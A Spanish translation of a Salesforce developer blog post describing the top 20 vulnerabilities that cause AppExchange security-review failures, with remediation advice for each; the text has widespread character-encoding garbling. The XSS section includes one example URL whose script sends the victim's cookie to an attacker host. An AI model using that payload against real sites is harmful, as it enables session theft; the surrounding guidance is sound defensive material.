Skip to content

Tag: revisiones

Las 20 vulnerabilidades principales encontradas en la revisi贸n de seguridad de AppExchange 鈽侊笍

Las 20 vulnerabilidades principales encontradas en la revisi贸n de seguridad de AppExchange 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Las 20 principales vulnerabilidades encontradas en la revisi贸n de seguridad de AppExchange | Blog de desarrolladores de Salesforce

Se sabe que la revisi贸n de seguridad de AppExchange es uno de los procesos de revisi贸n m谩s rigurosos de cualquier mercado de aplicaciones en l铆nea. Esta estricta reputaci贸n es algo de lo que Salesforce se enorgullece, siendo la confianza nuestro valor n煤mero uno. Como mercado de software empresarial, tenemos la profunda responsabilidad de cumplir con los m谩s altos est谩ndares de seguridad posibles para la protecci贸n de los datos de los clientes.

Dicho esto, estos est谩ndares pueden representar un desaf铆o importante para los socios ISV que buscan publicar ofertas en AppExchange. Para ayudar a mejorar la transparencia y ayudarlos a todos a tener 茅xito, en orden de prevalencia, esta publicaci贸n analizar谩 las 20 razones principales por las que los socios no pasan la revisi贸n de seguridad (a partir de 2023). Tambi茅n cubriremos c贸mo remediar o prevenir estos problemas.

#1 鈥 Aplicaci贸n de CRUD/FLS

驴Qu茅 es esto?

Las vulnerabilidades de aplicaci贸n de la seguridad a nivel de objetos y campos (CRUD/FLS) son la raz贸n principal (por un margen significativo) para no pasar la revisi贸n de seguridad de AppExchange. Estas vulnerabilidades representan fallas al verificar adecuadamente si los objetos y/o campos son accesibles, creables, eliminables y/o actualizables antes de ejecutar consultas o acciones de base de datos. Si su oferta de AppExchange contiene alg煤n c贸digo de Salesforce, este problema debe ser su prioridad n煤mero uno a resolver antes de enviarlo para una revisi贸n de seguridad.

驴C贸mo puedo abordar esto?

Si, durante su proceso de codificaci贸n, no ha implementado consistentemente comprobaciones CRUD/FLS o no ha ejecutado SOQL, SOSL y DML en modo de usuario, querr谩 hacer una revisi贸n muy exhaustiva de su c贸digo base para asegurarse de que no est茅 realizar cualquier operaci贸n de creaci贸n/lectura/actualizaci贸n/eliminaci贸n no marcada en objetos o campos.

El m茅todo preferido y moderno para hacer cumplir CRUD/FLS implica utilizar el modo de usuario en todas las consultas y operaciones de bases de datos. La desventaja de esto es que Checkmarx, PMD y el motor de reglas PMD de Code Analyzer a煤n no lo admiten completamente (al momento de escribir esta publicaci贸n, PMD admite WITH USER_MODE en SOSL/SOQL, pero no el modo de usuario DML, por lo que si usa este tipo de protecci贸n arrojar谩 falsos positivos). Code Analyzer Graph Engine es actualmente la 煤nica herramienta que admite ambos tipos de modos de usuario. Consulte el comando scanner:run:dfa en la documentaci贸n para ejecutar un escaneo con Code Analyzer Graph Engine.

Si ha estado aplicando CRUD/FLS a la antigua usanza con Schema.DescribeSObjectResult (es decir, m茅todos como isCreatable() , isUpdateable() , isDeletable() ), entonces Code Analyzer y la extensi贸n PMD para VS Code pueden ser 煤tiles herramientas que puede utilizar para comprobar su c贸digo base. Puede seguir nuestra gu铆a para obtener m谩s informaci贸n sobre c贸mo utilizar PMD para VS Code y Code Analyzer para eliminar las infracciones CRUD/FLS.

El esc谩ner Checkmarx debe utilizarse como verificaci贸n final de violaciones de CRUD/FLS. Puede ejecutar este an谩lisis a trav茅s del Portal de seguridad para socios .

Obtenga m谩s informaci贸n sobre la aplicaci贸n de CRUD/FLS en Trailhead .

#2 鈥 Versi贸n de software insegura

驴Qu茅 es esto?

Esto significa que alguna pieza de software (normalmente, una versi贸n espec铆fica del software) utilizada en su oferta tiene vulnerabilidades de seguridad conocidas. La mayor铆a de las veces, es porque est谩s usando una versi贸n desactualizada de una biblioteca de JavaScript (por ejemplo, jQuery es, con diferencia, la m谩s com煤n), pero tambi茅n podr铆a ser algo as铆 como versiones antiguas de nginx, bibliotecas de Python, CKEditor o PHP.

驴C贸mo puedo abordar esto?

Intente identificar todas las bibliotecas, marcos, software y otras tecnolog铆as que no sean de Salesforce dentro del alcance de su oferta de AppExchange.

Busque cada uno de estos en Snyk (para proyectos de c贸digo abierto) o en la base de datos CVE . CVE significa "vulnerabilidades y exposiciones comunes" y la base de datos CVE representa un glosario de vulnerabilidades de seguridad conocidas p煤blicamente que es mantenido y operado por el FFRDC Nacional de Ciberseguridad de EE. UU. y MITRE Corporation. Tambi茅n puede utilizar el complemento RetireJS de Salesforce Code Analyzer para ejecutar un escaneo de su c贸digo base empaquetado para buscar bibliotecas de JavaScript con vulnerabilidades conocidas.

Nota: En algunos casos, puede agregar documentaci贸n de falsos positivos para argumentar que un CVE particular registrado no podr铆a aplicarse a su oferta, ya que quiz谩s no est茅 utilizando la funcionalidad asociada con ese CVE.

#3 鈥 Violaci贸n al compartir

驴Qu茅 es esto?

B谩sicamente, esto significa que tiene clases de Apex en las que no ha agregado expl铆citamente la palabra clave with sharing al encabezado de la clase, omitiendo as铆 las reglas de uso compartido de una organizaci贸n.

驴C贸mo puedo abordar esto?

Simplemente verifique todas sus clases de Apex y aseg煤rese de tener with sharing (o el uso compartido heredado) definido en el encabezado de la clase. Para los casos en los que necesita que una clase se ejecute sin compartir (por ejemplo, la clase debe ejecutarse en un contexto de sistema y no en un contexto de usuario), agregue una explicaci贸n a su documento de falso positivo que explique el caso de uso empresarial (e idealmente, agregue comentarios en la parte superior). de los encabezados de clase relevantes para que quede a煤n m谩s claro).

Code Analyzer , PMD para VS Code y Checkmarx tambi茅n pueden ayudarlo a escanear su c贸digo.

Obtenga m谩s informaci贸n sobre c贸mo compartir el cumplimiento a trav茅s de Trailhead .

#4: Almacenamiento inseguro de datos confidenciales

驴Qu茅 es esto?

Los secretos no deben estar codificados en el c贸digo fuente. Aunque el c贸digo puede estar contenido en un paquete administrado donde el c贸digo est谩 oculto para los clientes, todav铆a existen razones por las que esta es una pr谩ctica insegura, entre ellas:

  • El cliente debe tener control sobre sus secretos y claves y, en muchos casos, debe poder cambiarlos o actualizarlos.
  • Los secretos pueden quedar expuestos en registros o mensajes de error
  • Si un secreto o clave caduca, el cliente no podr谩 actualizarlo por s铆 mismo.

驴C贸mo puedo abordar esto?

Aseg煤rese de que no haya secretos codificados en el c贸digo fuente, incluso si es un paquete administrado. Aseg煤rese de que todos los secretos se almacenen de una de las siguientes maneras:

  • Campos de metadatos personalizados protegidos (para secretos propiedad de socios)
  • Configuraciones personalizadas protegidas (para secretos propiedad del suscriptor/cliente)
  • Credenciales con nombre (esto generalmente no se recomienda, pero si tiene un caso de uso espec铆fico que lo requiera, es posible que se permita caso por caso)
  • Cifrado y almacenado en objetos personalizados con la clave de cifrado almacenada en una configuraci贸n personalizada protegida o en un campo de metadatos personalizados ocultos

Obtenga m谩s informaci贸n sobre el almacenamiento seguro de secretos en Trailhead .

#5 鈥 Configuraci贸n TLS/SSL

驴Qu茅 es esto?

Todas las conexiones entrantes y salientes que involucran a sus comunidades, sitios y portales de Salesforce deben utilizar Transport Layer Security (TLS) 1.2. Este requisito es v谩lido en los modos Lightning Experience y Salesforce Classic para comunidades y sitios, independientemente de si est谩n en las ediciones Essentials, Enterprise, Performance, Unlimited o Developer.

驴C贸mo puedo abordar esto?

Verifique que el acceso a su navegador, las integraciones de API y otras funciones de Salesforce sean compatibles con TLS 1.2.

Una forma sencilla de hacerlo es utilizar Qualys SSL Scanner. El equipo de revisi贸n de seguridad ejecutar谩 este an谩lisis en todos y cada uno de los puntos finales externos o que no sean de Salesforce involucrados en su soluci贸n. Si sus terminales no reciben una calificaci贸n A por cumplimiento de SSL/TLS, su revisi贸n de seguridad no ser谩 aprobada.

Para ejecutar el escaneo, simplemente ingrese la URL base en el formulario web de prueba del servidor SSL de Qualys y presione Enviar.

Puede encontrar m谩s detalles sobre los requisitos de TLS en las notas de la versi贸n .

#6 鈥 Informaci贸n confidencial en depuraci贸n

驴Qu茅 es esto?

Este tipo de vulnerabilidad describe situaciones en las que se filtra informaci贸n confidencial, como secretos de aplicaciones, datos del sistema o informaci贸n de depuraci贸n demasiado detallada, a trav茅s de funciones de registro u otros flujos de salida. Por lo general, esto sucede cuando el registro detallado est谩 habilitado para fines de desarrollo, pero luego no se reduce adecuadamente antes de enviarlo para la revisi贸n de seguridad de AppExchange.

驴C贸mo puedo abordar esto?

En su paquete de Salesforce, aseg煤rese de buscar en su c贸digo fuente todas las declaraciones de depuraci贸n del paquete para asegurarse de que no registren informaci贸n confidencial o secretos.

Aseg煤rese de que los c贸digos de error y los mensajes de error en toda su soluci贸n tengan un nivel de informaci贸n apropiado para que todos los usuarios los vean. Por ejemplo, los usuarios habituales generalmente no deber铆an ver seguimientos de pila completos ni informaci贸n de depuraci贸n detallada. De manera similar, aseg煤rese de que otras funciones de registro o flujos de salida tampoco filtren datos confidenciales.

Code Analyzer y PMD para VS Code pueden ayudarlo a detectar estos problemas en las aplicaciones de Salesforce, y los esc谩neres de aplicaciones web como Burp Suite , Chimera u OWASP ZAP tambi茅n pueden ayudarlo a detectar estos problemas en sus integraciones externas y aplicaciones web.

Obtenga m谩s informaci贸n sobre c贸mo verificar los seguimientos de la pila e informaci贸n detallada sobre las excepciones en el n煤mero 13.

#7 – CSRF

驴Qu茅 es esto?

La falsificaci贸n de solicitudes entre sitios (CSRF) es un tipo de ataque que enga帽a a una v铆ctima para que ejecute acciones no deseadas en una aplicaci贸n web en la que est谩 autenticada. Explotar la confianza que un sitio tiene en el navegador del usuario puede llevar a acciones potencialmente da帽inas, como cambiar direcciones de correo electr贸nico y contrase帽as, o incluso realizar transacciones sin el conocimiento o consentimiento del usuario.

En la plataforma Salesforce, existe un token anti-CSRF para contrarrestar dichos ataques, que ofrece protecci贸n mientras se utilizan controladores y m茅todos est谩ndar. Sin embargo, los desarrolladores pueden eludir involuntariamente estas salvaguardas anti-CSRF al crear sus propios m茅todos de acci贸n.

驴C贸mo puedo abordar esto?

En general, las aplicaciones web pueden prevenir ataques CSRF principalmente implementando tokens anti-CSRF, que son valores 煤nicos y espec铆ficos del usuario incluidos en cada solicitud de cambio de estado para verificar la fuente. Adem谩s, deben adoptar la pr谩ctica de cookies del mismo sitio, que impide que el navegador env铆e la cookie junto con solicitudes entre sitios, mitigando as铆 los riesgos de CSRF.

Para p谩ginas de Visualforce:

  • Al crear p谩ginas de Visualforce, evite utilizar solicitudes HTTP GET que cambien de estado; use POST o PUT para cambios de estado en su lugar
  • No ejecute acciones autom谩ticas ni cambie el estado (por ejemplo, operaciones DML) al cargar la p谩gina.
  • Otra t茅cnica de mitigaci贸n implica agregar una p谩gina de confirmaci贸n intermedia antes de realizar la acci贸n, donde el usuario puede confirmar que ten铆a la intenci贸n de realizar esa acci贸n.

Para componentes Lightning:

  • De manera similar a las p谩ginas de Visualforce, evite cambiar el estado o ejecutar acciones al cargar un componente Lightning, mediante enlaces como init (para Aura) ,connectedCallback , renderedCallback o constructor .

Al realizar llamadas API:

  • Para las API que no son de Salesforce, es posible que tambi茅n desee agregar su propio token CSRF.

CSRF es uno de los tipos de problemas de seguridad m谩s complicados, por lo que vale la pena invertir en aprender m谩s sobre 茅l en profundidad. Para los paquetes de Salesforce, existe excelente documentaci贸n para desarrolladores y un m贸dulo Trailhead como referencia.

Para otros tipos de aplicaciones web, es posible que desees consultar la documentaci贸n de OWASP .

Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas en sus aplicaciones web externas.

N.潞 8: secuencias de comandos entre sitios (XSS) almacenadas y reflejadas

驴Qu茅 es esto?

Los ataques de secuencias de comandos entre sitios (XSS) son problemas de inyecci贸n en los que se insertan secuencias de comandos da帽inas en sitios web confiables. Ocurren cuando un atacante explota una aplicaci贸n web para enviar c贸digo malicioso, a menudo un script del lado del cliente, a un usuario diferente. Estos ataques explotan fallas en aplicaciones web que utilizan entradas de usuario no validadas o codificadas en su salida.

En un ataque XSS, el navegador de un usuario desprevenido ejecuta el script malicioso, creyendo que proviene de una fuente confiable. Esto permite que el script acceda a cookies, tokens de sesi贸n u otros datos confidenciales almacenados en el navegador. Incluso puede modificar el contenido HTML de la p谩gina.

Los ataques XSS almacenados son de tipo persistente, en los que la aplicaci贸n web almacena la entrada maliciosa y luego se muestra a los usuarios. Los ataques XSS reflejados, por otro lado, generalmente ocurren cuando se inyecta c贸digo malicioso en una URL, que se ejecuta cuando un usuario hace clic en ella (por ejemplo: http://example.com/search?query=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script> ).

Los motivos por los que su aplicaci贸n podr铆a ser susceptible incluyen:

  • Entrada no validada : las aplicaciones pueden aceptar entradas del usuario y usarlas o mostrarlas en una p谩gina sin validarlas adecuadamente (para garantizar que no contenga c贸digo/scripts ejecutables).
  • Campos de texto enriquecido : almacenar entradas en campos RTF de Salesforce es riesgoso porque admiten contenido HTML, por lo que debe validar la entrada para evitar que se almacenen XSS.
  • P谩ginas de Visualforce : pueden ser susceptibles si utilizan entradas generadas por el usuario en el cuerpo HTML o en JavaScript sin un escape de entrada o codificaci贸n de salida adecuados.
  • Componentes web Aura y Lightning (LWC) : aunque tienen protecciones integradas contra XSS, los desarrolladores pueden evitar estas protecciones mediante cosas como el uso de la propiedad innerHTML , lwc:dom=鈥漨anual鈥 o el componente lightning:formattedRichText sin la validaci贸n de entrada adecuada.
  • Par谩metros de URL : las aplicaciones pueden usarlos directamente en el HTML o JavaScript de una p谩gina sin validaci贸n (lo que lleva a XSS reflejado).

驴C贸mo puedo abordar esto?

Su objetivo principal debe ser evitar la manipulaci贸n de DOM, pero tambi茅n recomendamos practicar el filtrado de entrada y la codificaci贸n de salida, que incluyen:

  • Evite la manipulaci贸n del modelo de objetos de documento (DOM): en su lugar, utilice t茅cnicas como directivas de plantilla y evite funciones de JavaScript potencialmente inseguras (por ejemplo, eval() , DOMParser.parseFromString() , Document.implementation.createHTMLDocument() , setTimeout() , setInterval() )
  • Filtrado de entrada: aseg煤rese de que la entrada del usuario no contenga c贸digo ejecutable mediante el uso de expresiones regulares y listas de bloqueo o listas de permitidos (por ejemplo, filtre los caracteres com煤nmente utilizados en el c贸digo, como '<', '>', comillas simples o dobles, ' /', ';', corchetes, par茅ntesis u operadores matem谩ticos o l贸gicos como '+', '&' o '-')
  • Codificaci贸n de salida : aseg煤rese de que si el c贸digo ejecutable pasara el filtrado de entrada, no se interprete como c贸digo al convertir caracteres "peligrosos" en versiones de texto inofensivas (por ejemplo, '&; debe convertirse a &amp; y '<' o '>' debe convertirse a &lt; y &gt;)

Este m贸dulo de Trailhead explica exactamente c贸mo mitigar XSS con estas t茅cnicas, y nuestra documentaci贸n para desarrolladores tambi茅n es 煤til aqu铆. Para obtener consejos espec铆ficos sobre la protecci贸n contra XSS en componentes Lightning, consulte la p谩gina Seguridad Lightning en la Gu铆a de codificaci贸n segura.

Para aplicaciones web que no son de Salesforce, tambi茅n puede consultar la documentaci贸n de OWASP para obtener consejos adicionales.

Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas.

#9: JavaScript no est谩 en recursos est谩ticos

驴Qu茅 es esto?

Muchos paquetes administrados por Salesforce no pasan la revisi贸n de seguridad por no almacenar JavaScript como recursos est谩ticos en sus paquetes y, en su lugar, se vinculan a archivos JavaScript alojados externamente con etiquetas <script> . La raz贸n principal de esta regla es que permite un control de versiones mucho m谩s seguro y garantiza la integridad de los archivos JavaScript en su paquete de Salesforce incluso si la fuente externa est谩 comprometida.

驴C贸mo puedo abordar esto?

Nuestra regla es que todos los recursos de script y estilo deben agregarse al paquete como recursos est谩ticos y luego cargarse con una etiqueta <apex:includeScript> en su p谩gina (para Visualforce) o un ltng:require en su .cmp o .app. marcado (para Aura).

Nota: Si tiene un LWC, defina los m贸dulos JavaScript que importe a su componente o use la funci贸n loadScript para cargar un archivo JavaScript de recursos est谩ticos.

Para paquetes que no son LWC, la mejor manera de verificar este problema es buscar manualmente su c贸digo fuente para asegurarse de que todas las bibliotecas de JavaScript est茅n almacenadas como recursos est谩ticos, no cargadas din谩micamente a trav茅s de hiperv铆nculos.

Para situaciones en las que esto no sea factible, recomendamos programar una cita en horario de oficina t茅cnica para analizar su caso de uso. Es posible obtener una excepci贸n en ciertos casos.

Obtenga m谩s informaci贸n sobre este problema en nuestra documentaci贸n para desarrolladores .

#10 鈥 Inyecci贸n SOQL

驴Qu茅 es esto?

La inyecci贸n SOQL es la versi贸n espec铆fica de Salesforce de la inyecci贸n SQL. Ocurre cuando una entrada no validada proporcionada por el usuario se inserta directamente en una consulta SOQL din谩mica. Si la entrada no est谩 validada, puede incluir comandos SOQL que modifican efectivamente la declaraci贸n SOQL y enga帽an a la aplicaci贸n para que ejecute comandos no deseados.

驴C贸mo puedo abordar esto?

La forma m谩s sencilla de evitar el problema es evitar consultas din谩micas en favor de consultas est谩ticas y utilizar variables vinculantes. De lo contrario, deber谩 validar estrictamente las entradas del usuario antes de usarlas en consultas mediante t茅cnicas como encasillamiento, lista blanca de entradas o escape.

Code Analyzer , PMD para VS Code y Checkmarx tambi茅n pueden ayudarlo a escanear su c贸digo.

Para obtener m谩s informaci贸n, consulte nuestro m贸dulo Trailhead o revise nuestra documentaci贸n para desarrolladores .

Para aplicaciones que no son de Salesforce, es posible que desee obtener m谩s informaci贸n sobre la inyecci贸n SQL en la gu铆a OWASP . Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudar a identificar problemas de inyecci贸n SQL.

#11 鈥 Lightning: carga CSS inadecuada

驴Qu茅 es esto?

Similar al problema de usar etiquetas <script> o <link> para cargar JavaScript en sus paquetes, usar etiquetas <link> o <style> para cargar CSS en lugar de <apex:stylesheet> (Visualforce) o <ltng:require> ( Aura) se considera una pr谩ctica insegura. Estas etiquetas <link> y <style> pueden hacer referencia a recursos externos o en l铆nea que contienen CSS o JavaScript, y la arquitectura de seguridad Lightning Web Security (LWS) de Salesforce no los controla ni los desinfecta.

Para los componentes de Aura, en particular, el uso de <ltng:require> tambi茅n permite a Salesforce aplicar correctamente las reglas de seguridad LWS y garantizar que el CSS que est谩 cargando est茅 correctamente aislado y no incluya c贸digo o estilos JavaScript no seguros que puedan afectar negativamente a otros. partes de su aplicaci贸n Salesforce.

驴C贸mo puedo abordar esto?

Para hacer referencia a un recurso CSS externo que haya subido como recurso est谩tico, use una etiqueta <apex:stylesheet> en su p谩gina (para Visualforce) o una etiqueta <ltng:require> en su marcado .cmp o .app (para Aura ). Busque el c贸digo fuente de su paquete para asegurarse de que no haya utilizado etiquetas <link> o <style> en ning煤n lugar para cargar recursos CSS.

Nota: Si tiene una LWC, no puede encontrarse con este problema de todos modos porque, al igual que las etiquetas <script> , las etiquetas <style> ya est谩n bloqueadas para su uso dentro de las plantillas HTML. En su lugar, incluir铆a su CSS en el archivo CSS asociado de su componente o usar铆a la funci贸n loadStyle para cargar un archivo CSS de recursos est谩ticos.

Puede encontrar m谩s informaci贸n en nuestra documentaci贸n para desarrolladores .

#12: JavaScript en Salesforce DOM (solo experiencia cl谩sica)

驴Qu茅 es esto?

Salesforce tiene reglas estrictas sobre el uso de JavaScript y una de esas reglas es que JavaScript no se puede ejecutar directamente dentro del contexto de la aplicaci贸n Salesforce. Esto significa que no puede incluir bloques de JavaScript directamente dentro de los componentes que se ejecutan en Salesforce DOM, como HomePageComponents, WebLinks, Custom Buttons, etc.

En cambio, todo JavaScript debe residir bajo el dominio de espacio de nombres de su aplicaci贸n en las p谩ginas de Visualforce que usted controla, de modo que el JavaScript personalizado est茅 esencialmente aislado del DOM principal de Salesforce. Eso significa que no puede usar JavaScript para crear botones personalizados, pesta帽as web, componentes de p谩gina de inicio y elementos similares (por ejemplo, incluir controladores de eventos de JavaScript onclick en botones personalizados podr铆a ser motivo de falla).

驴C贸mo puedo abordar esto?

Esto es algo que deber谩 verificar manualmente en el c贸digo fuente de su paquete Salesforce. Verifique y aseg煤rese de que no haya utilizado JavaScript para crear botones personalizados, pesta帽as web, componentes de la p谩gina de inicio u otros elementos similares, y verifique que cualquier JavaScript personalizado est茅 incluido solo en el dominio de su aplicaci贸n con espacio de nombres en las p谩ginas de VisualForce que controla como parte de su aplicaci贸n.

Una forma de verificar esto es buscar el texto <openType>onClickJavaScript</openType> en los archivos de metadatos de la aplicaci贸n (a menudo en archivos XML como weblink/something.weblink) y, si lo encuentra, aseg煤rese de eliminarlo. Incluso si su aplicaci贸n solo est谩 destinada a usarse en Lightning Experience, si la vulnerabilidad est谩 presente para los usuarios en modo Cl谩sico, el paquete no se puede aprobar.

Esta regla en particular no est谩 especialmente bien documentada, pero puede leer m谩s en el documento Lista de verificaci贸n de revisi贸n de seguridad de AppExchange (se requiere iniciar sesi贸n en la comunidad de socios).

#13 鈥 Divulgaci贸n de informaci贸n en p谩ginas de error y excepciones

驴Qu茅 es esto?

En el contexto de la revisi贸n de seguridad de AppExchange, este t茅rmino se refiere espec铆ficamente a situaciones (generalmente en aplicaciones o servicios web que no son de Salesforce o fuera de plataforma) donde sus p谩ginas de error muestran datos confidenciales del sistema o informaci贸n de depuraci贸n. Por ejemplo, a veces las p谩ginas de error incluyen seguimientos de pila completos que muestran c贸mo se hace referencia internamente a los objetos o rutas de archivo relativas al lugar donde est谩 instalada la aplicaci贸n. A veces, incluso la informaci贸n confidencial queda expuesta de esta manera.

驴C贸mo puedo abordar esto?

Busque en su base de c贸digo llamadas que causen excepciones o que los seguimientos de pila se representen en cadenas o flujos de salida, y realice pruebas que puedan causar errores, como entradas no v谩lidas, entradas vac铆as, entradas demasiado largas, acceso a p谩ginas internas sin autenticaci贸n, omisi贸n de aplicaciones. flujo, etc

La herramienta de fuzzing de Burp Suite puede ser una gran ayuda en este caso.

Tambi茅n puede obtener excelentes consejos para realizar pruebas de seguimiento de pila a trav茅s de esta gu铆a de OWASP .

#14 鈥 Componentes de Aura: componente externo de CSS

驴Qu茅 es esto?

Se supone que los componentes de Aura son peque帽os, aut贸nomos, reutilizables y reposicionables. CSS que evita la encapsulaci贸n de componentes (a trav茅s de .THIS) o que utiliza un posicionamiento no est谩ndar (por ejemplo, flotante o posici贸n: absoluta o fija) infringe estas garant铆as y puede interferir con la visualizaci贸n de otros componentes. En particular, el uso del posicionamiento absoluto en CSS es la raz贸n principal de este tipo de falla.

Si bien esto puede no parecer un problema de seguridad a primera vista, puede alterar el dise帽o del sitio web de Salesforce y viola el esp铆ritu del modelo de seguridad de Lightning, donde los componentes est谩n estrictamente aislados y se garantiza que permanecer谩n en su propio carril.

驴C贸mo puedo abordar esto?

Este es otro problema que debes verificar manualmente. B谩sicamente, busque en el CSS de su componente Aura, especialmente para posicionamiento absoluto/fijo o ancho y alto fijos. Tambi茅n recomendamos revisar nuestra documentaci贸n para asegurarse de que est谩 siguiendo todas las reglas CSS correctas.

#15 鈥 Canal de mensajes expuesto

驴Qu茅 es esto?

Este t茅rmino se refiere espec铆ficamente a los casos en los que no ha configurado el indicador isExposed en Lightning Message Channel en falso. Dado que esto proporciona acceso a la API del Servicio de mensajes Lightning (LMS), que le permite publicar y suscribirse a mensajes en todo el DOM y entre Aura, Visualforce y Lightning Web Components, debe establecerse en falso a menos que sea realmente necesario.

驴C贸mo puedo abordar esto?

Tiene dos opciones, seg煤n su caso de uso, que incluyen:

  1. Registre un ticket de soporte para solicitar que se habilite la eliminaci贸n de componentes administrados para su paquete u organizaci贸n de Dev Hub y elimine el componente del paquete. Si no puede hacerlo (por ejemplo, si esto afectar铆a la funcionalidad de los suscriptores que dependen de canales de mensajes expuestos), puede dejar el componente en el paquete y simplemente no usarlo (aseg煤rese de mencionar esto espec铆ficamente en un mensaje falso). documento positivo sobre su presentaci贸n).
  2. Si tiene que utilizar un componente de canal LMS, aseg煤rese de tener isExposed=false . Esto debe hacerse creando un nuevo componente de canal LMS porque los componentes existentes con isExposed=true no pueden cambiar isExposed=false . Utilice 煤nicamente el componente reci茅n creado en el c贸digo.

M谩s informaci贸n est谩 disponible en la documentaci贸n .

#16 鈥 Informaci贸n confidencial en URL

驴Qu茅 es esto?

Esto se refiere a una situaci贸n en la que se env铆a informaci贸n confidencial de larga duraci贸n en URL (por ejemplo, un ID o secreto de cliente, o un nombre de usuario/contrase帽a). En realidad, esto puede llevar a que se filtren secretos a largo plazo de varias maneras posibles. Por ejemplo:

  • Las URL completas a menudo se almacenan en servidores en registros de texto sin cifrar que pueden no almacenarse de forma segura y pueden ser vistos por el personal o comprometidos por un tercero.
  • Los motores de b煤squeda indexan URL y almacenan inadvertidamente informaci贸n confidencial
  • Almacenamiento de rutas URL completas en el historial del navegador local, cach茅 del navegador, marcadores y marcadores sincronizados entre dispositivos
  • Informaci贸n de URL enviada a aplicaciones web de terceros a trav茅s del encabezado de referencia o expuesta a scripts de terceros en la p谩gina

驴C贸mo puedo abordar esto?

Burp Suite puede ayudarle aqu铆 para aplicaciones web que no sean de Salesforce o fuera de plataforma, pero en general recomendamos comprobar manualmente su aplicaci贸n para detectar cualquier caso en el que se env铆en secretos a largo plazo a trav茅s de URL. Dependiendo de su caso de uso, es posible que deba realizar cambios, como usar solicitudes POST en lugar de solicitudes GET, cambiar su m茅todo de autenticaci贸n (OAuth 2.0 es generalmente ideal) y emplear cifrado y mejores m茅todos de almacenamiento de secretos.

La gu铆a OWASP es un gran recurso a seguir.

#17 鈥 Punto final inseguro

驴Qu茅 es esto?

El nombre de esta vulnerabilidad simplemente se refiere a situaciones en las que se utiliza HTTP en lugar de HTTPS.

驴C贸mo puedo abordar esto?

Las herramientas de escaneo pueden ser de ayuda, pero una forma a煤n m谩s segura de verificar esto es buscar en el c贸digo fuente enlaces HTTP y cambiarlos a HTTPS. Puede aprender un poco m谩s sobre c贸mo esto mejora la seguridad en esta p谩gina de OWASP .

#18 鈥 Enumeraci贸n de nombre de usuario o correo electr贸nico

驴Qu茅 es esto?

Por lo general, este problema solo surge en aplicaciones web externas fuera de la plataforma Salesforce. Se refiere a una situaci贸n en la que los atacantes pueden enumerar listas de nombres de usuario o correos electr贸nicos de su base de usuarios, generalmente analizando cambios en mensajes de error en funciones de inicio de sesi贸n, funciones de olvido de contrase帽a o registros de cuentas. Los atacantes suelen hacer esto para poder comprobar si hay contrase帽as reutilizadas de bases de datos comprometidas y fugas o volcados de contrase帽as.

驴C贸mo puedo abordar esto?

Verifique sus mensajes de error para registros de cuentas, recuperaci贸n de contrase帽as, intentos de inicio de sesi贸n, etc., y aseg煤rese de que su mensaje de error sea el mismo independientemente de si el nombre de usuario o el correo electr贸nico ingresado es v谩lido.

Por ejemplo, muchos sitios incluyen un mensaje gen茅rico, como: "Si dicho usuario existe, recibir谩 un correo electr贸nico con un restablecimiento de contrase帽a". Este tipo de mensaje general evita confirmar la existencia de un nombre de usuario o correo electr贸nico.

Por supuesto, en determinadas situaciones, puede ser inevitable (por ejemplo, durante el registro de una cuenta, es posible que deba confirmar que se ha utilizado un nombre de usuario). En esas situaciones, intente implementar controles que impidan la enumeraci贸n por fuerza bruta, como captchas para evitar que los robots eliminen su formulario de registro.

Burp Suite es una excelente herramienta para verificar esto, pero si no la tiene, tambi茅n puede revisar sus funcionalidades de inicio de sesi贸n manualmente.

OWASP tiene una gu铆a 煤til para evitar la enumeraci贸n de correos electr贸nicos y nombres de usuarios.

#19 鈥 Gesti贸n de contrase帽as

驴Qu茅 es esto?

En ocasiones, el equipo de seguridad falla en sitios y aplicaciones web externos (que no sean Salesforce) por tener pol铆ticas de contrase帽as problem谩ticas, como por ejemplo:

  • Permitir la reutilizaci贸n de la misma contrase帽a cuando es necesario restablecerla
  • No solicitar la contrase帽a anterior cuando se permite a los usuarios establecer una nueva contrase帽a
  • Para restablecer la contrase帽a, enviar una contrase帽a temporal al correo electr贸nico de un usuario en texto sin formato
  • Dejar contrase帽as predeterminadas en los usuarios ra铆z del servidor o de la base de datos

驴C贸mo puedo abordar esto?

Adem谩s de evitar las situaciones anteriores, consulte la Hoja de referencia de autenticaci贸n de OWASP para obtener algunas pautas sobre c贸mo establecer pol铆ticas de contrase帽as seguras:

Burp Suite tambi茅n es muy 煤til para identificar problemas relacionados con las contrase帽as (por ejemplo, puede usarlo para intentar forzar sus p谩ginas de inicio de sesi贸n).

#20 鈥 Eco de contrase帽a

驴Qu茅 es esto?

Esto es un poco diferente del problema de administraci贸n de contrase帽as descrito anteriormente. Un eco de contrase帽a se refiere a situaciones en las que las contrase帽as se reflejan en texto sin formato en la interfaz de usuario (como cuando el usuario visita su propia p谩gina de configuraci贸n) o en llamadas API/respuestas JSON.

驴C贸mo puedo abordar esto?

Aseg煤rese de que su contrase帽a no se revele ni se transmita en texto sin formato en ninguna parte de su aplicaci贸n. Aseg煤rese de que en las p谩ginas de configuraci贸n u otras p谩ginas que muestran secretos, se muestren solo como asteriscos (se pueden mostrar al hacer clic en el bot贸n si es necesario).

Consulte la hoja de referencia sobre almacenamiento de contrase帽as de OWASP para obtener m谩s informaci贸n.

Burp Suite , o quiz谩s Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas.

Recursos adicionales

Si su soluci贸n incluye sitios web o aplicaciones web personalizados que no son de Salesforce, le recomendamos encarecidamente invertir en una licencia de Burp Suite si es financieramente viable para su organizaci贸n. Burp Suite es una de las mejores herramientas de seguridad del mercado y tambi茅n la utiliza mucho nuestro propio equipo de seguridad de productos. Chimera u OWASP ZAP son alternativas completamente gratuitas, pero prep谩rate para invertir m谩s tiempo en t茅rminos de revisi贸n manual, ya que carecen de muchas de las potentes funciones/herramientas que tiene Burp Suite.

Nota: Si su oferta se integra con aplicaciones o servicios web que no son de su propiedad, no intente escanear los puntos finales hasta que haya obtenido el permiso del propietario.

